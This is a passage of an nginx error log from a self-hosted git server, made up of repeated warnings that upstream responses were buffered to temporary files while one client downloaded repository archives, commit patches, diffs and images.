/windpacer/AssetPilot/archive/main.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/archive/main.zip", host: "git.hanmocnn.co.kr" -2026/02/15 06:51:38 [warn] 740#740: *11438 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/49/0000004499 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/archive/main.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/archive/main.tar.gz", host: "git.hanmocnn.co.kr" -2026/02/15 06:51:38 [warn] 740#740: *11438 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/50/0000004500 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/branch/main/.TemporaryDocument HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/branch/main/.TemporaryDocument", host: "git.hanmocnn.co.kr" -2026/02/15 08:09:35 [warn] 818#818: *12089 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/51/0000004516 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb.patch", host: "git.hanmocnn.co.kr" -2026/02/15 08:09:35 [warn] 818#818: *12089 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/51/0000004517 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml", host: "git.hanmocnn.co.kr" -2026/02/15 08:09:35 [warn] 818#818: *12089 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/51/0000004518 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py", host: "git.hanmocnn.co.kr" -2026/02/15 08:09:55 [warn] 819#819: *12162 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/51/0000004519 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.patch", host: "git.hanmocnn.co.kr" -2026/02/15 08:09:55 [warn] 819#819: *12162 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/52/0000004520 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec.patch", host: "git.hanmocnn.co.kr" -2026/02/15 08:09:55 [warn] 819#819: *12162 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/52/0000004521 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96", host: "git.hanmocnn.co.kr" -2026/02/15 08:09:56 [warn] 819#819: *12162 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/52/0000004522 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.diff HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.diff", host: "git.hanmocnn.co.kr" -2026/02/15 08:09:56 [warn] 819#819: *12162 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/52/0000004523 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache", host: "git.hanmocnn.co.kr" -2026/02/15 08:11:18 [warn] 820#820: *12326 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/52/0000004524 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md", host: "git.hanmocnn.co.kr" -2026/02/15 08:54:20 [warn] 822#822: *12750 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/52/0000004528 while reading upstream, client: 136.114.146.187, server: git.hanmocnn.co.kr, request: "GET /assets/js/index.js?v=1.25.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index.js?v=1.25.3", host: "git.hanmocnn.co.kr" -2026/02/15 09:30:12 [warn] 823#823: *12811 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/52/0000004529 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96.patch", host: "git.hanmocnn.co.kr" -2026/02/15 09:30:27 [warn] 816#816: *13019 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/53/0000004530 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/archive/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/archive/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3.zip", host: "git.hanmocnn.co.kr" -2026/02/15 09:30:27 [warn] 816#816: *13019 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/53/0000004531 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/branch/main/.Backup/html/types.ts HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/branch/main/.Backup/html/types.ts", host: "git.hanmocnn.co.kr" -2026/02/15 09:30:27 [warn] 816#816: *13019 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/53/0000004532 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md?display=rendered HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md?display=rendered", host: "git.hanmocnn.co.kr" -2026/02/15 09:30:27 [warn] 816#816: *13019 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/53/0000004533 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/branch/main/html/index.html?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/branch/main/html/index.html?display=source", host: "git.hanmocnn.co.kr" -2026/02/15 09:31:41 [warn] 817#817: *13499 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/53/0000004534 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.bundle", host: "git.hanmocnn.co.kr" -2026/02/15 09:32:20 [warn] 819#819: *13783 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/53/0000004535 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/archive/18fa480c84b358da8bf50d54057f53591759225f.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/archive/18fa480c84b358da8bf50d54057f53591759225f.zip", host: "git.hanmocnn.co.kr" -2026/02/15 09:32:20 [warn] 819#819: *13783 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/53/0000004536 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/dbserver/archive/3181052619700dceeeef81a9a0851130498f177e.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/dbserver/archive/3181052619700dceeeef81a9a0851130498f177e.zip", host: "git.hanmocnn.co.kr" -2026/02/15 09:32:23 [warn] 819#819: *13783 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/53/0000004537 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/a0a212e41c7ebc2699ea736d71d145b9844673ec.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/a0a212e41c7ebc2699ea736d71d145b9844673ec.bundle", host: "git.hanmocnn.co.kr" -2026/02/15 09:32:24 [warn] 819#819: *13783 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/53/0000004538 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/ebd2be03a23e76e126207d40a257d72f40ab9a7c.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/ebd2be03a23e76e126207d40a257d72f40ab9a7c.bundle", host: "git.hanmocnn.co.kr" -2026/02/15 09:32:29 [warn] 819#819: *13783 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/53/0000004539 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.zip", host: "git.hanmocnn.co.kr" -2026/02/15 09:32:50 [warn] 819#819: *13926 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/54/0000004540 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/7e5f452449b5385fa46a3a589ed6aac00a02734a.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/7e5f452449b5385fa46a3a589ed6aac00a02734a.bundle", host: "git.hanmocnn.co.kr" -2026/02/15 09:32:50 [warn] 819#819: *13926 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/54/0000004541 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?style=split&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?style=split&whitespace=ignore-change", host: "git.hanmocnn.co.kr" -2026/02/15 09:32:50 [warn] 819#819: *13926 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/54/0000004542 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=docker-compose.yml HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=docker-compose.yml", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:02 [warn] 818#818: *14071 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/54/0000004543 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:08 [warn] 818#818: *14071 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/54/0000004544 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.bundle", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:10 [warn] 818#818: *14071 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/54/0000004545 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/7e5f452449b5385fa46a3a589ed6aac00a02734a.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/7e5f452449b5385fa46a3a589ed6aac00a02734a.zip", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:37 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/54/0000004546 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/a0a212e41c7ebc2699ea736d71d145b9844673ec.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/a0a212e41c7ebc2699ea736d71d145b9844673ec.zip", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:37 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/54/0000004547 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.tar.gz", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:37 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/54/0000004548 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore?display=source", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:38 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/54/0000004549 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-eol HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-eol", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:40 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/55/0000004550 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/ebd2be03a23e76e126207d40a257d72f40ab9a7c.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/ebd2be03a23e76e126207d40a257d72f40ab9a7c.zip", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:40 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/55/0000004551 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:40 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/55/0000004552 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?style=split&whitespace=ignore-eol HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?style=split&whitespace=ignore-eol", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:40 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/55/0000004553 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:41 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/55/0000004554 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:41 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/55/0000004555 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py?display=source", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:42 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/55/0000004556 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:44 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/55/0000004557 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:59 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/55/0000004558 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/998d733eb52423ffff2f8602efdfb1282198a61f.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/998d733eb52423ffff2f8602efdfb1282198a61f.tar.gz", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:59 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/55/0000004559 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-change", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:59 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/56/0000004560 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-all", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:59 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/56/0000004561 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=show-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=show-all", host: "git.hanmocnn.co.kr" -2026/02/15 09:33:59 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/56/0000004562 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-eol HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-eol", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:00 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/56/0000004563 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/63aec54418d3c1735d68bf046c7a9e78a247798d.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/63aec54418d3c1735d68bf046c7a9e78a247798d.tar.gz", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:03 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/56/0000004564 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/998d733eb52423ffff2f8602efdfb1282198a61f.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/998d733eb52423ffff2f8602efdfb1282198a61f.zip", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:04 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/56/0000004565 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/63aec54418d3c1735d68bf046c7a9e78a247798d.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/63aec54418d3c1735d68bf046c7a9e78a247798d.zip", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:05 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/56/0000004566 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?style=split&whitespace=ignore-eol HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?style=split&whitespace=ignore-eol", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:05 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/56/0000004567 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.tar.gz", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:05 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/56/0000004568 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?style=unified&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?style=unified&whitespace=ignore-all", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:05 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/56/0000004569 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=mail_contact.py HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=mail_contact.py", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:05 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/57/0000004570 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=unified&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=unified&whitespace=ignore-change", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:05 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/57/0000004571 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=unified&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=unified&whitespace=ignore-all", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:05 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/57/0000004572 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?style=split&whitespace=show-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?style=split&whitespace=show-all", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:06 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/57/0000004573 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/a0a212e41c7ebc2699ea736d71d145b9844673ec.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/a0a212e41c7ebc2699ea736d71d145b9844673ec.tar.gz", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:26 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/57/0000004574 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:26 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/57/0000004575 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?style=unified&whitespace=show-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?style=unified&whitespace=show-all", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:26 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/57/0000004576 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, 